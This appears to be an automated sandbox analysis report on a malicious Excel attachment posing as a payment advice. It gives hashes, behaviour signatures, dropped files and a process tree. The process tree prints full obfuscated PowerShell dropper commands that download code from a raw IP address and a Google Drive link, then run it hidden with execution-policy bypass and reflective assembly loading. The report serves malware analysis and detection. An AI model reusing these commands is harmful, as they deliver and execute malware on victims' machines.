Analysis

  • max time kernel
    107s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    04-11-2024 06:58

General

  • Target

    PaymentAdvice-RefA22D4YdWsbE4.xla.xls

  • Size

    937KB

  • MD5

    b01b76c877321d03dab23c4d1bb26e48

  • SHA1

    faf698726f93f31fc1fcab31e8942d690220fa10

  • SHA256

    421895be443167f773741e1681d27ba2052fbef90d4def330cadb3206dbd651c

  • SHA512

    6756a5eefa442726525208796c7406146407be1a779655a647cdd3caa38a5c761848caf5a978e4cd612713aaef9307221411372859dffa82c860d723b307fc64

  • SSDEEP

    12288:2UXN9WeWy3aJwF1E3Zjy5dbHsu6KGsW+DYavtKVUgGw6M6ozBdUepzBf88SKe:fusaGF1EpyYu67sdDNVK+f9oTptaK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-RefA22D4YdWsbE4.xla.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1236
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\SysWOW64\WiNdOwSPowERShELL\V1.0\POweRSHELL.eXE
      "C:\Windows\SystEm32\WiNdOwSPowERShELL\V1.0\POweRSHELL.eXE" "POweRSheLl.ExE -Ex BYpASS -NOp -w 1 -c devICEcrEdenTIAlDeploymEnt.Exe ; iEX($(iex('[SYsTeM.texT.encODInG]'+[cHAR]58+[ChaR]58+'utf8.GETsTriNg([sYSTEM.coNVERT]'+[ChAR]0x3a+[CHar]58+'fROMbASe64StRINg('+[chAr]34+'JHFZZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJkRWZpTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybE1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5YWFac1VaeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDWGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENMVUZDQix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVlEelp3aSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRZGhFS0lReEpvKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRE1kQWZZamhGSk0iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGx5S2JlaVhFUWRqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxWWY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQuMjMvMTIwL2JpZ25ld3N3aXRoZ3JlYXRjYXJld2l0aGdyZWF0bmV3c2NvaW4udElGIiwiJEVudjpBUFBEQVRBXGJpZ25ld3N3aXRoZ3JlYXRjYXJld2l0aGdyZWF0bmV3c2NvaW4udkJzIiwwLDApO3N0QXJULVNsZUVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxiaWduZXdzd2l0aGdyZWF0Y2FyZXdpdGhncmVhdG5ld3Njb2luLnZCcyI='+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASS -NOp -w 1 -c devICEcrEdenTIAlDeploymEnt.Exe
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1152
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jjyn1rub.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES47F9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC47F8.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:852
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bignewswithgreatcarewithgreatnewscoin.vBs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSXpiaW1hZ2VVcmwgPSBVMkVodHRwczovL2RyaScrJ3ZlLmdvb2dsZS5jb20nKycvdWM/ZXhwb3J0PScrJ2Rvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0wnKydsMXQyU3RWZ0d4YicrJ1N0MCBVMkU7SXpid2ViQ2xpZW50ID0gTicrJ2V3LU9iamVjdCAnKydTeXN0ZW0uTmV0LldlYkNsaScrJ2VudDtJemJpbWFnZUJ5dGVzID0gSXpid2ViQ2xpZW50LkRvd25sb2FkRGF0YShJemJpbWEnKydnZVVybCk7SXpiaW1hZ2VUZXh0ID0gW1N5cycrJ3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoSXpiaW1hZ2VCeXRlcyk7SXpic3RhcnRGbGFnID0gVTJFPDxCQVNFNjRfU1RBUlQ+PlUyRTtJemJlbmRGbGFnID0gVTJFPDxCQVNFNjRfRU5EPj5VMkU7SXpic3RhJysncnRJbmRleCA9IEl6YmltYWdlVGV4dC5JJysnbmRlJysneE9mKEl6YnN0YXJ0RmxhZyk7SXpiZW5kJysnSW5kZXggPSBJemInKydpbWFnZVRleHQuSW5kZXhPZihJemJlbmRGbGFnKTtJemJzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgSXpiZW5kSW5kZXggLWd0IEl6YnN0YXJ0SW5kZXg7SScrJ3pic3RhcnRJbmRleCArPSBJemJzdGFydEZsYWcuTGVuZ3RoO0l6YmJhc2U2NExlbmd0aCA9IEl6YmVuZEluZGV4IC0gSXpic3RhcnRJbmRleDtJemJiYXNlNjRDJysnb21tYW5kID0gSXpiaW1hZ2VUZXh0LlN1YnN0cmknKyduZyhJemJzdGEnKydydEluZGV4LCBJemJiYXNlNjRMZW5ndGgpO0l6YmJhc2U2NFJldmVyJysnc2VkICcrJz0gLWpvaW4gKEl6YmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBDZnYgRm9yRWFjaC1PYmplY3QgeyBJemJfIH0pWy0nKycxLi4tKEl6YmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07SXpiY29tbWFuZEJ5JysndGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluJysnZygnKydJemJiYXNlNjRSZXZlcnMnKydlZCk7SXpibG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZScrJ21ibHldOjpMb2FkKEl6YmNvbScrJ21hbmRCeXRlcyk7SXpidmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChVJysnMkVWQUlVMkUpO0l6YnZhaU1ldCcrJ2hvZC5JbnZva2UoSXpibnVsbCwgQChVMkV0eHQuUlRNTUFDLzAyMS8zMi40LjM3MS43MDEvLzpwdHRoVTJFLCBVMkVkZScrJ3NhdGl2YWRvVTJFLCBVMkVkZXNhdGl2YWQnKydvVTJFLCBVMkVkZXNhdGl2YWQnKydvVTJFLCBVMkVhc3BuZXRfcmVnYnJvd3NlcnNVMkUsICcrJ1UyRWRlc2F0aScrJ3ZhZG9VMkUsIFUyRWRlc2F0aXZhZG9VMkUsVTJFZGVzYXRpdmFkb1UyRSxVMkVkJysnZXNhdGl2YWRvVTJFLFUyRWRlc2F0aXZhZG9VMkUsVTJFZGVzYXRpdmFkb1UyRSxVMkVkZXNhdGl2YWRvVTJFLFUyRTEnKydVMkUsVTJFZGVzYXRpdmFkb1UyRSkpOycpIC1DckVQbEFDRSAgKFtjaGFyXTczK1tjaGFyXTEyMitbY2hhcl05OCksW2NoYXJdMzYgIC1SZXBMQWNFKFtjaGFyXTg1K1tjaGFyXTUwK1tjaGFyXTY5KSxbY2hhcl0zOSAgLUNyRVBsQUNFICAoW2NoYXJdNjcrW2NoYXJdMTAyK1tjaGFyXTExOCksW2NoYXJdMTI0KXwmICggJHNoRWxMaWRbMV0rJHNoZWxMSURbMTNdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('IzbimageUrl = U2Ehttps://dri'+'ve.google.com'+'/uc?export='+'download&id=1UyHqwrnXClKBJ3j63L'+'l1t2StVgGxb'+'St0 U2E;IzbwebClient = N'+'ew-Object '+'System.Net.WebCli'+'ent;IzbimageBytes = IzbwebClient.DownloadData(Izbima'+'geUrl);IzbimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(IzbimageBytes);IzbstartFlag = U2E<<BASE64_START>>U2E;IzbendFlag = U2E<<BASE64_END>>U2E;Izbsta'+'rtIndex = IzbimageText.I'+'nde'+'xOf(IzbstartFlag);Izbend'+'Index = Izb'+'imageText.IndexOf(IzbendFlag);IzbstartInde'+'x -ge 0 -and IzbendIndex -gt IzbstartIndex;I'+'zbstartIndex += IzbstartFlag.Length;Izbbase64Length = IzbendIndex - IzbstartIndex;Izbbase64C'+'ommand = IzbimageText.Substri'+'ng(Izbsta'+'rtIndex, Izbbase64Length);Izbbase64Rever'+'sed '+'= -join (Izbbase64Command.ToCharArray() Cfv ForEach-Object { Izb_ })[-'+'1..-(Izbbase64Command.Length)];IzbcommandBy'+'tes = [System.Convert]::FromBase64Strin'+'g('+'Izbbase64Revers'+'ed);IzbloadedAssembly = [System.Reflection.Asse'+'mbly]::Load(Izbcom'+'mandBytes);IzbvaiMethod = [dnlib.IO.Home].GetMethod(U'+'2EVAIU2E);IzbvaiMet'+'hod.Invoke(Izbnull, @(U2Etxt.RTMMAC/021/32.4.371.701//:ptthU2E, U2Ede'+'sativadoU2E, U2Edesativad'+'oU2E, U2Edesativad'+'oU2E, U2Easpnet_regbrowsersU2E, '+'U2Edesati'+'vadoU2E, U2EdesativadoU2E,U2EdesativadoU2E,U2Ed'+'esativadoU2E,U2EdesativadoU2E,U2EdesativadoU2E,U2EdesativadoU2E,U2E1'+'U2E,U2EdesativadoU2E));') -CrEPlACE ([char]73+[char]122+[char]98),[char]36 -RepLAcE([char]85+[char]50+[char]69),[char]39 -CrEPlACE ([char]67+[char]102+[char]118),[char]124)|& ( $shElLid[1]+$shelLID[13]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2516

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    67e486b2f148a3fca863728242b6273e

    SHA1

    452a84c183d7ea5b7c015b597e94af8eef66d44a

    SHA256

    facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

    SHA512

    d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    8e15c6ed583e71d2593feb7446e98b02

    SHA1

    0a253d016a21803d83fe9154b60892b0812e3a7e

    SHA256

    150eb8c607c617e6d507e435629b18ebe93aac85e179d1335f65c2dfa1e502f2

    SHA512

    db3097460993082661c783593f17e50779370c6883036279d7f9ad3d757530d99dd566da124908c2c681f2cc34b7a914fe41ecb6fb9e6d9ff5a53de08284f1e5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    7d60107696a9da8cfe5cc77f5ef2c53c

    SHA1

    ed75c33e6ec96a0d8ed4a33a9ece8f630bffc5f0

    SHA256

    0b8c92edfc9162bbea99b359965ed736f8ce2d4c3c91d62e84f6ed16e4d06099

    SHA512

    552d271bfccfe26644c722a8859817c00edd35774d28c421f79fe6066b3df1d2c8768780175e50d7d669c328ed0060b8812ed1dac72e5a9d321f371c5f66294f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\givingbestthignswithgreatheatcaptialthingstodo[1].hta

    Filesize

    8KB

    MD5

    353f7a90e348a8d2bdfb43ab66c346a8

    SHA1

    8c3fe6f75902b08c86e41bf1be160e4440365040

    SHA256

    7d2d9436fafa26b4154db9f3f6cf4ed556a84d0483824b729ecff072c16fc3b2

    SHA512

    2a7fef9cdc269696185a3a48679a5bac15cfe9d26325eec7fb08a68f24b60445b4f30fdc87dd3116d613b1619e0dd169e3f93f48c8c3aaf4760b67c8740d23b9

  • C:\Users\Admin\AppData\Local\Temp\Cab3350.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES47F9.tmp

    Filesize

    1KB

    MD5

    e4cd7e457c7f3461d0dac01657478ebf

    SHA1

    58edc0ee62f11e0c8a04aa5a0845ba142cd45960

    SHA256

    8461428511654e0e422459aa01c633b80c676dc5c38b964d28c4720044fff543

    SHA512

    90b73a598808b4628192e856478d267bbda98913279720a2b6883005ab951a18d688cb01185865e62364d39716cb9c45965e3110d3329100dd73b01132210128

  • C:\Users\Admin\AppData\Local\Temp\jjyn1rub.dll

    Filesize

    3KB

    MD5

    c389dd0a800631dd4e0ec8936dc6a9ce

    SHA1

    b5850c04ac7b52031e90696a801b9252db257afb

    SHA256

    d2234423fe4b71b1e88d2e3cea952ddeb40fd4ce2353a264db7dfc50f94afc8c

    SHA512

    cb745fd75c983fc9c7742b0a3bbb50fa71c121019004141aa1d78ca7ee910af3a8f752b1adb81cff8f02238f60196821689c404d8d874fc8cecc66dabcb84930

  • C:\Users\Admin\AppData\Local\Temp\jjyn1rub.pdb

    Filesize

    7KB

    MD5

    e3223d024e1208341253a665ca14d39d

    SHA1

    73f9242d6ec002df1ed249e4e68528dff4434362

    SHA256

    9ce00eeb5c9d8507f3907740039ed225c179ba25969df0eaa2a035bae812fb05

    SHA512

    5b4542ef7944edcb82c1d70a06211e808be93defa165db244233de4251e80ba86ba18898c58ccf0f4435b5717e9059e11b7957e5ffe92756869dec2c4093d897

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d40d4794b392093743bab85149c4c236

    SHA1

    6c1a90bf75ff80fac2c304ba07f02382556d9f51

    SHA256

    5d0b5916ecde7e404afb1c41568387b63914b0fc29ac509fdc3529bb1ad23a35

    SHA512

    09cd06b2092f7a3237f8b35c7318ff07ce73e0ad1ae8dc702971da6d563546eb4a11aa8f580f439126c68efcdcd3b5bdc1ce27ee66bcf5299fced6a7848aa27d

  • C:\Users\Admin\AppData\Roaming\bignewswithgreatcarewithgreatnewscoin.vBs

    Filesize

    138KB

    MD5

    1218c95ec6f264e88b7d898fd0fc6d42

    SHA1

    94f31297300031173e7b4364871c01bbcc9c140a

    SHA256

    5c621ae89965e84bdcff75fbaf673fd46bed97af61515194c2404eab8adc0222

    SHA512

    e7fa2ec9f9f3b316237daa3e49624b3cb2335e21b2ebcff960bf6761db929965e385b19d30d883ba7f00d506a5bb548adf92d1d2793b6e0c109087acf3b4e094

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC47F8.tmp

    Filesize

    652B

    MD5

    f6247c9fc474a3bc69b892343e995f2d

    SHA1

    ce7dc66f704f90e743863b77538f8da7b9afc265

    SHA256

    d3637c70cc4f5e92960cb305af9a822742ebf3a30e1e2d6aaee1d7acc1e890ac

    SHA512

    f6c3e3bdb39b3eec7f99dfc06e148b765e995f74216dfcb75d9e7cea1e4e1001fbe0d1e6de5fa4ec82b678bafea0c0a072d53bd2c4d40258822f243919a50408

  • \??\c:\Users\Admin\AppData\Local\Temp\jjyn1rub.0.cs

    Filesize

    494B

    MD5

    15c5338a5204b04ba2db22fee2cf4c74

    SHA1

    8be6a8dd7a0c1b2aa7726fd38ce299c91a8ea675

    SHA256

    ad491871f4a69a0125d1d563d68c4d458d271c5e3f0e818be0ba0100a462af39

    SHA512

    70720287371d0964f027d369f01f8ac84eaa1cb92306025076a0be564e3a40a65096b5206e8b2fa5c8290779dd34de28b4cb63c1a1e362407f9f5a6bb9bcdc1e

  • \??\c:\Users\Admin\AppData\Local\Temp\jjyn1rub.cmdline

    Filesize

    309B

    MD5

    28833f1846286dbbf0ec1b72278ee318

    SHA1

    536ddf9c709bf32fec260d16d919edeacfaf73b7

    SHA256

    5f898e7c44ef2710dafb387de66000c82823d778271c0b1f6750f09f7e699122

    SHA512

    21b5aca0846b7cda2933321032d25b748ace8f7543054b9b27507b4f7b5a83de3640c3d06140ca9d6931d34521001e5792a28de5829b7ebe899c5e8b0b718e45

  • memory/1236-17-0x0000000002410000-0x0000000002412000-memory.dmp

    Filesize

    8KB

  • memory/1236-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1236-1-0x0000000073E5D000-0x0000000073E68000-memory.dmp

    Filesize

    44KB

  • memory/1236-60-0x0000000073E5D000-0x0000000073E68000-memory.dmp

    Filesize

    44KB

  • memory/2148-16-0x0000000002AC0000-0x0000000002AC2000-memory.dmp

    Filesize

    8KB